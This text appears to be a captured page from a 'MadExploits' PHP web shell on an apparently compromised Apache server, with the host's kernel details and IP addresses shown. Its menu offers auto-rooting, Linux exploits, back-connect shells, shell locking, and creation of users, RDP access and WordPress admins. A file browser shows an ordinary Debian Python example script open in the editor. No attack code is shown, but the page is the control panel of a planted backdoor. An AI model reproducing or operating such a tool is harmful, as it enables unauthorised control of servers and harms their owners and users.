Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 18.119.99.38
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
python3-debian /
examples /
debfile /
[ HOME SHELL ]
Name
Size
Permission
Action
ar
1.32
KB
-rwxr-xr-x
changelog_head
1004
B
-rwxr-xr-x
dpkg-info
1.78
KB
-rwxr-xr-x
extract_cron
1.23
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : changelog_head
#!/usr/bin/python # changelog_head - head like tool for .deb changelog entries # Copyright (C) 2007 Stefano Zacchiroli <zack@debian.org> # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. """Like "head" for changelog entries, return last n-th entries of the changelog shipped in a .deb file.""" from __future__ import print_function import sys from debian import debfile if __name__ == '__main__': if len(sys.argv) > 3 or len(sys.argv) < 2: print("Usage: changelog_head DEB [ENTRIES]") print(" ENTRIES defaults to 10") sys.exit(1) entries = 10 try: entries = int(sys.argv[2]) except IndexError: pass deb = debfile.DebFile(sys.argv[1]) chg = deb.changelog() entries = chg._blocks[:entries] print(''.join(map(str, entries)))
Close